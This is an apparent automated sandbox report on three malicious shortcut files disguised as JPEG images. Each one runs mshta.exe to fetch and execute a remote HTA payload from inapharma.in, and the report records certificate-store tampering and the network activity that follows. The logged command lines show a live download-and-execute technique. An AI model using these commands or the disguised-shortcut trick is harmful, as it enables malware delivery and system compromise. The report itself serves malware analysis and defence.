SHA256 7838794872d83079d1a912e0201a76aff8b42404dde2117a5c57a3bb3310d1df
SHA512 d4f538231d4c67407778dbfa6d825c53e59ce70e11a9d8add0e47ee248c0d8b5053285f197e9259af24898e15178a600f5bf852ef3a98258c61c9c67a9898aa8

Analysis: behavioral26

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win10v2004-20220310-en

Max time kernel

236s

Max time network

721s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122331.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\svchost.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4904 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 4904 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122331.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122331

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
NL 104.80.225.205:443 storesdk.dsx.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 20.223.25.224:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl4.digicert.com udp
US 93.184.220.29:80 crl4.digicert.com tcp
US 93.184.220.29:80 crl4.digicert.com tcp

Files

memory/4416-135-0x00007FFA34E10000-0x00007FFA358D1000-memory.dmp

memory/4416-136-0x000001E8C03C6000-0x000001E8C03C7000-memory.dmp

memory/3600-137-0x0000027A8ED70000-0x0000027A8ED80000-memory.dmp

memory/3600-138-0x0000027A8EFA0000-0x0000027A8EFB0000-memory.dmp

memory/3600-139-0x0000027A8F190000-0x0000027A8F194000-memory.dmp

memory/3600-140-0x0000027A91640000-0x0000027A91644000-memory.dmp

memory/3600-141-0x0000027A91620000-0x0000027A91621000-memory.dmp

memory/3600-142-0x0000027A8F1C0000-0x0000027A8F1C4000-memory.dmp

memory/3600-143-0x0000027A8F1B0000-0x0000027A8F1B1000-memory.dmp

memory/3600-144-0x0000027A8F1B0000-0x0000027A8F1B4000-memory.dmp

memory/3600-145-0x0000027A8F0B0000-0x0000027A8F0B1000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win10v2004-en-20220113

Max time kernel

701s

Max time network

714s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210628_105339.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3764 wrote to memory of 432 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 3764 wrote to memory of 432 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210628_105339.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210628_105339

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.247.211.254:80 tcp
US 8.247.211.254:80 tcp

Files

memory/432-131-0x0000023E2FA46000-0x0000023E2FA47000-memory.dmp

memory/432-132-0x00007FFC84020000-0x00007FFC84AE1000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:42

Platform

win10v2004-20220310-en

Max time kernel

205s

Max time network

277s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210713121548.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\Download\ca4af4339884f7018bf988ecac7702ff\BIT50D4.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d341f4322500ef92547a141039af2d20\o\egfDu3QHOC\BIT894D.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d1d4bb0c910695f4fcf53d8f91faafa7\BIT6520.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\17087e6e4710e63df4fcd8834f70bc99\pj5OoD7hJ+dBGy+3XOjLT8WsuYwervv\LZOCjtiHKk8= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d60cb501610b6a66743c55eade3ef996\BIT2CA.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\17087e6e4710e63df4fcd8834f70bc99\BIT637.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\cb9f14b7916e97a31f1e53948ed1b67f\6\v9GXr9MSfUt92b0dEpOsHH2H0TwcnvKmtIW8g3ovM= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d60cb501610b6a66743c55eade3ef996\CsA9z1\SlUHUPO8bKnA\5ondRmJ90JlkPETuN535TWk= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\cb9f14b7916e97a31f1e53948ed1b67f\BIT763F.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\7752a73587b3362d505a041fe7f69ecd\BIT56FF.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\2ef09e08315a593ec3af8ec57ab6a31e\YZBnsYBVNBTl3Isrrjy7P0\FTTOLXxEZk0li+ZNE2Uo= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\2ef09e08315a593ec3af8ec57ab6a31e\BIT6948.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d341f4322500ef92547a141039af2d20\BIT8A09.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\ca4af4339884f7018bf988ecac7702ff\9+dL4Puh6FM8puPxsBEX86BMeGqpuC0b7gf2fD9DLLo= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\ca4af4339884f7018bf988ecac7702ff\BIT5018.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\7752a73587b3362d505a041fe7f69ecd\BIT579D.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\cb9f14b7916e97a31f1e53948ed1b67f\BIT71B8.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\cb9f14b7916e97a31f1e53948ed1b67f\c3ca3df6b0660cc02fa0c60992eb1164c186b223 C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\cb9f14b7916e97a31f1e53948ed1b67f\6\BIT75B1.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d60cb501610b6a66743c55eade3ef996\f3535a3b47819a04c6d5ee18905493be086e801e C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\2ef09e08315a593ec3af8ec57ab6a31e\BIT623F.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\26794b1631618c81e2caec277357b370\BIT7159.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d341f4322500ef92547a141039af2d20\BIT8BB1.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d60cb501610b6a66743c55eade3ef996\BITE7E9.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d60cb501610b6a66743c55eade3ef996\CsA9z1\SlUHUPO8bKnA\BIT1BF.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\7752a73587b3362d505a041fe7f69ecd\BIT4D67.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\2ef09e08315a593ec3af8ec57ab6a31e\YZBnsYBVNBTl3Isrrjy7P0\BIT68CA.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d341f4322500ef92547a141039af2d20\o\egfDu3QHOC\Xbfe7KpvVnvJHxQ2cRDBmUlnoMnpDY= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d341f4322500ef92547a141039af2d20\2cd32031792245e69c7777193005916861cbbe94 C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\17087e6e4710e63df4fcd8834f70bc99\pj5OoD7hJ+dBGy+3XOjLT8WsuYwervv\BITE8D4.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d1d4bb0c910695f4fcf53d8f91faafa7\d9f2a302574bf135efc9dbd1a8083a336f7f52f0 C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\cb9f14b7916e97a31f1e53948ed1b67f\6\BIT70DB.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\26794b1631618c81e2caec277357b370\BIT7216.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\9d6172fa1dc41a48846593219fc6519f\BITF317.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\9d6172fa1dc41a48846593219fc6519f\BITF644.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\9d6172fa1dc41a48846593219fc6519f\e1a85885fd4453165061351651289cce8f8590c4 C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\9d6172fa1dc41a48846593219fc6519f\BIT3D74.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\7752a73587b3362d505a041fe7f69ecd\F2WKV54ysEMEW9U+EfiUeJcNcgfNL4pMC5NmE0a3mAg= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\26794b1631618c81e2caec277357b370\BIT82E3.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d341f4322500ef92547a141039af2d20\BIT93F1.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\ca4af4339884f7018bf988ecac7702ff\BIT4A19.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\ca4af4339884f7018bf988ecac7702ff\BIT4AA6.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\ca4af4339884f7018bf988ecac7702ff\612ad442b8740f4c57b8c84e6bf465ba4699118c C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\7752a73587b3362d505a041fe7f69ecd\af66e12c1bb9d8519da21259d0fcd88c247cb4f1 C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d1d4bb0c910695f4fcf53d8f91faafa7\Jda7di8befpfPWz3DrhkMwwJL9XbuL8\BIT6104.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\26794b1631618c81e2caec277357b370\fbaaae7103d0f0a1303a40d280aa18bafcd08dcf C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\17087e6e4710e63df4fcd8834f70bc99\a3f602ea4d534d006919a2613d91f9506b383314 C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\9d6172fa1dc41a48846593219fc6519f\BIT3E6F.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d1d4bb0c910695f4fcf53d8f91faafa7\Jda7di8befpfPWz3DrhkMwwJL9XbuL8\fDFnweOZvFE= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d1d4bb0c910695f4fcf53d8f91faafa7\BIT621F.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d60cb501610b6a66743c55eade3ef996\CsA9z1\SlUHUPO8bKnA\BITE74B.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\17087e6e4710e63df4fcd8834f70bc99\pj5OoD7hJ+dBGy+3XOjLT8WsuYwervv\BIT56A.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\7752a73587b3362d505a041fe7f69ecd\BIT4C2E.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\2ef09e08315a593ec3af8ec57ab6a31e\YZBnsYBVNBTl3Isrrjy7P0\BIT61B1.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\26794b1631618c81e2caec277357b370\BIT8275.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\17087e6e4710e63df4fcd8834f70bc99\BITEE72.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\9d6172fa1dc41a48846593219fc6519f\Cmn5TH6S2lFFnfMN8MLr2EoNUIAGzQo2UUjHGMEC99A= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\2ef09e08315a593ec3af8ec57ab6a31e\6e15245aed25ee83b027521f9cf9ea812c9d016d C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\26794b1631618c81e2caec277357b370\daNJ9YVgpN191GzoPynRDpTEDO9uUytOK6Ln7xcN8To= C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d341f4322500ef92547a141039af2d20\o\egfDu3QHOC\BIT8B24.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d341f4322500ef92547a141039af2d20\o\egfDu3QHOC\BIT9344.tmp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\Download\d1d4bb0c910695f4fcf53d8f91faafa7\Jda7di8befpfPWz3DrhkMwwJL9XbuL8\BIT64A2.tmp C:\Windows\System32\svchost.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\svchost.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4308 wrote to memory of 1264 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 4308 wrote to memory of 1264 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210713121548.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image5

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 storesdk.dsx.mp.microsoft.com udp
NL 104.80.225.205:443 storesdk.dsx.mp.microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 store-images.s-microsoft.com udp
NL 104.123.41.133:80 store-images.s-microsoft.com tcp
NL 104.123.41.133:80 store-images.s-microsoft.com tcp
US 8.8.8.8:53 licensing.mp.microsoft.com udp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 store-images.s-microsoft.com udp
NL 104.123.41.133:80 store-images.s-microsoft.com tcp
NL 104.123.41.133:80 store-images.s-microsoft.com tcp
NL 104.123.41.133:80 store-images.s-microsoft.com tcp
US 20.96.63.25:443 licensing.mp.microsoft.com tcp
US 8.8.8.8:53 api.msn.com udp
